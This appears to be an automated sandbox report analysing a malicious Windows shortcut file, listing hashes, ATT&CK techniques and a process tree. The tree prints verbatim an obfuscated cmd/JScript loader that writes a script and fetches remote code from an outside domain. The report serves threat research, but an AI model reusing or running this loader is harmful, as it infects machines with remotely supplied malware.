66fce0858a04c838f27ca2f39aedd6a82992ead1fe6d1cb65713daad8293ac47

Analysis

max time kernel
106s
max time network
109s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2023 13:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

F02963133.311031.71683.lnk
Size

1023B
MD5

7d0736d13c2030c2b0fd0402f5bf5f2f
SHA1

dec9891b7e0fbfafa064e9ba0136654b00ca453d
SHA256

fb3cae26fcce3d41937858a20adf31643fafad66b4b6803a1457db0dde146f64
SHA512

05b331086ad4d116d05cc922cbc8a3b7545771794b8f32e2dac3fb691303f3fbc45b83ab51022823ad9870c4d6a486db4060cf4b2bad01729d0889637c12382d

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	4480	WScript.exe
14	4480	WScript.exe
19	4480	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3036	conhost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1072 wrote to memory of 3036	1072	cmd.exe	83
PID 1072 wrote to memory of 3036	1072	cmd.exe	83
PID 3036 wrote to memory of 5000	3036	conhost.exe	85
PID 3036 wrote to memory of 5000	3036	conhost.exe	85
PID 5000 wrote to memory of 4480	5000	cmd.exe	87
PID 5000 wrote to memory of 4480	5000	cmd.exe	87

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\F02963133.311031.71683.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\p3HURH8\>nul 2>&1 &&s^eT TFLA=C:\p3HURH8\^p3HURH8.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0045\u0071\u0070\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0045\u0071\u0070\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0045\u0071\u0070\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0045\u0071\u0070\u002b\u0044\u0045\u0071\u0070\u002b\u0045\u0045\u0071\u0070\u002b\u0022\u002f\u002f\u0065\u0030\u0061\u0075\u006e\u0077\u002e\u0074\u0065\u0063\u006e\u0069\u0063\u006f\u0062\u006f\u006d\u0062\u0061\u0064\u006f\u002e\u006d\u0061\u006b\u0065\u0075\u0070\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!TFLA!&&ca^ll !TFLA!"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "md C:\p3HURH8\>nul 2>&1 &&s^eT TFLA=C:\p3HURH8\^p3HURH8.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0045\u0071\u0070\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0045\u0071\u0070\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0045\u0071\u0070\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0045\u0071\u0070\u002b\u0044\u0045\u0071\u0070\u002b\u0045\u0045\u0071\u0070\u002b\u0022\u002f\u002f\u0065\u0030\u0061\u0075\u006e\u0077\u002e\u0074\u0065\u0063\u006e\u0069\u0063\u006f\u0062\u006f\u006d\u0062\u0061\u0064\u006f\u002e\u006d\u0061\u006b\u0065\u0075\u0070\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!TFLA!&&ca^ll !TFLA!"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\p3HURH8\p3HURH8.Js"
      4⤵
      Blocklisted process makes network request
      PID:4480

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\F02963133.311031.71683.lnk

Filesize
2KB

MD5
f2386401540349716d49c4a6b43cbe9e

SHA1
68ba304e081c8efa897c017a033869187efd55f5

SHA256
f55ba48509a256ded4125968ae223cd027abb9dfe92a85bd03752664c79d84e0

SHA512
a7560a179d67d6bfda7e7e602e9af457b02fc4011608f497ad8450d25651cc850068f430cf33724819c8fc1ddc61da4ab82f02acb5c75b0ffc465ce7982ecf04

Download Submit
C:\p3HURH8\p3HURH8.Js

Filesize
684B

MD5
2afcbef152e232bfc2ef6e054b3965be

SHA1
32bcce4535670a4c4c8c0f076e19ee2be416b9ea

SHA256
fe0a6c63ae1193d25b96a66db7d9c95858243efe0821548d982e25586be12097

SHA512
b117798177304935a74181afbcef36d5935796f8aca2a90d927de7ae1cbb3e3d7deba070f254f085c53646eeb4ba35fec06381a84c0cff5226ec1f33f5aa88f2

Download Submit